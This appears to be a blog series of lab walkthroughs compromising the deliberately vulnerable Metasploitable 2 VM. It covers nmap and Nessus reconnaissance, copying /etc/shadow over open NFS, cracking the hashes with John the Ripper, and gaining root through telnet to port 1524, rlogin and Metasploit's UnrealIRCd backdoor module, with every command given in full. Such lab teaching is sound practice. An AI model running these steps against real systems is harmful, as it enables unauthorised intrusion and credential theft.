Metasploitable 2 – Password Hash Cracking with John the Ripper

This post assumes you have access to a the target filesystem in question and want to extract and then crack the password hashes from the local machine.

In this example I am going to crack the account passwords used in Metasploitable 2 but the techniques here can be used in many different scenarios.

John the Ripper is included by default with Kali 2 – which is what I am using here.

To be able to crack the accounts we need two files from the target system:

  • /etc/passwd  -> Containing the user information
  • /etc/shadow -> Containing the corresponding password hashes for the users

(Again there are various ways you could grab these files – for a vey simple example using Metaspolitable 2 as the target see this post here: https://securityaspirations.com/2017/07/03/metasploitable-2-compromise-nfs-shares/)

metasploitable_passwd

metasploitable_shadow

Once you have the two files we can begin cracking them with John the Ripper.

 

However before we give the hashes to John, we need to combine the two files into one so that the user and the password hashes are merged. We can do this with a utility called ‘Unshadow’ (also included in Kali2 by default).

 

The command required is:

unshadow  Path_to_passwd Path_to_shadow > output.txt

Metasploitable_Unshadow

Now we have the combined merged.txt file:

Metasploitable_merged

Now lets put john to work. We could supply a password list for John to use but it comes with a default set of passwords so we may as well try those first.

To start the crack, point John at our newly created file:

john merged.txt

Within a couple of seconds we appear to have a hit on most of the accounts:

Cracked_Hashes

It’s not always this quick and of course we are still missing the ‘root’ account but you get the idea. I let the crack run for another hour before cancelling but the root account had still not being cracked. The password may be hidden in the John password list I would just need to let the cracking process run to completion to find out. If that failed it might be worth trying some bigger password lists (such as the ‘rockyou’ list).

One way or another, once complete, you can view each of the accounts and their corresponding passwords by running the following command and referencing the original file you gave John to crack:

john show <file.txt>

Metasploitable_Cracked_passwords

If you want to confirm they work, test them out on the Metasploitable box:

Logged in as Sys

Metasploitable 2: Compromise – NFS Shares

Our Nessus scan results show an interesting vulnerability:

 Medium (5.0) 42256 NFS Shares World Readable

It’s only got a medium risk rating but who knows what data is in there.

Lets connect to it from our Kali box. There are various ways you could do this – here we can simply point the file browser at the box by specifying the system in the connect window:

nfs://192.168.168.134/

 

Connect NFS Metasploitable

Hit connect and we are in the root of the filesystem without any prompt for authentication:

NFS_Connected

We can take this further now by trying to grab the account password hashes from the system and then cracking them with something like John the Ripper.

Metasploitable 2 – Compromise: Root Shell

Remember our Nmap results? (https://securityaspirations.com/2017/06/25/metasploitable-2-system-recon/)

One of the entries in there was listed as follows:

1524/tcp  open  shell       Metasploitable root shell

This is probably one of the simplest Metasploitable vulns. There is a root shell open on the box, lets see if we can connect to it with telnet

telnet 192.168.168.134 1524

  • Telnet <dest_IP> <dest_Port>

 

Metasploitable root login

Surprisingly we are connected to the shell without being prompted for credentials.

A quick check with ‘whoami’ and ‘hostname’ commands confirms we are root and on the metasploitable box.

 

 

Metasploitable 2 – Compromise: UnrealIRC

Lets take a look at this Nmap result in more detail:

6667/tcp  open  irc         UnrealIRCd

Nessus results also show some details here:

Critical (10.0) 46882 UnrealIRCd Backdoor Detection

Worth checking to see if Metasploit has a module we can use here. Fire up Metasploit with:

msfconsole

And lets do a search for any hits on ‘unrealirc’:

search unrealirc

Metasploit_unrealirc

Great we have a hit, lets choose this exploit:

use exploit/unix/irc/unreal_ircd_3281_backdoor

use_unreal_exploit

We now need to configure it. To see what’s required, use:

show options

metasploit_unreal_show-options

Lets set our target (using our Metasploitable IP address) with:

set RHOST 192.168.168.134

Once done you can run ‘show options’ again to confirm it looks good:

metasploit_unrealirc_rhost

Now lets see if it works by typing ‘run’

run

Metasploit_unrealirc_exploit_run

Be aware that you may not get much feedback even if the exploit is successful.

Try typing ‘hostname’ as above and see what comes back. As you can see the exploit was successful, we have root access to the metasploitable box once more.

 

 

 

Metasploitable 2 – Compromise: rlogin

One of the simplest compromises of the Metasploitable box.

We can see from the nmap results:

513/tcp   open  login?

Nessus also detected the use of rlogin:

High (7.5) 10205 rlogin Service Detection

At this stage we don’t have any info on possible accounts on the Metasploitable box but it probably likely that there is a ‘root’ account.

As such we can try the following command and see what we get:

rlogin -l root 192.168.168.134
  • -l: user to login as

rlogin1

So we are prompted for a password – a good sign the root account is valid.

But there is actually more to this than the above suggests.

I am using a fresh install of Kali 2 and the rsh-client is not installed by default. So lets install it with:

apt-get install rsh-client

rsh-client

Now lets try that original rlogin command once more:

rlogin - compromise

Bingo… we’re in, and with root access no less.

Metasploitable 2 – Vuln scan with Nessus

One of the simplest ways to spot a simple attack vector is to simply peform a simple vuln check against the box.

In this case I am going to use Nessus Home (https://www.tenable.com/products/nessus-home) as it is free to sign up and does the job well.

Once Nessus Home is up and running (and up to date) we can kick off a scan against our box:Nessus Scan

And once complete we can take a look at the results:

Nessus_Metasploitable_summary

The full list of results with details can be found here:

Nessus Scan Report

Metasploitable 2 – System Recon

Now we know which IP to target – we can start performing some recon to gather some more details about the system.

Again there are various ways to do this but I like to start with nmap again.

nmap -sTV -o metasploitable -p1-65535 192.168.168.134
  • -sTV = T is connect scan, V is version scan
  • -o metasploitable  = output results to file called metasploitable
  • -p1-65535 – scan all ports in this range. Without this nmap will scan the top 1000 commonly used ports but that could miss some more obscure ports so this command scans them all
  • 192.168.168.134 – the ip of the metasploitable box

nmap_port_service_results

So we now have a full list of open ports on the Metasploitable box along with the likely service and even the version in use for each service/application.

Here is the full output:

 

# Nmap 7.40 scan initiated Sun May 14 15:24:23 2017 as: nmap -sTV -o metasploitable -p1-65535 192.168.168.134
Nmap scan report for 192.168.168.134
Host is up (0.00038s latency).
Not shown: 65505 closed ports

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd (Admin email admin@Metasploitable.LAN)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34140/tcp open  mountd      1-3 (RPC #100005)
37940/tcp open  status      1 (RPC #100024)
42380/tcp open  unknown
57109/tcp open  nlockmgr    1-4 (RPC #100021)

MAC Address: 00:0C:29:D5:07:11 (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 14 15:27:08 2017 -- 1 IP address (1 host up) scanned in 165.54 seconds

We can now use this information  to start exploiting the box.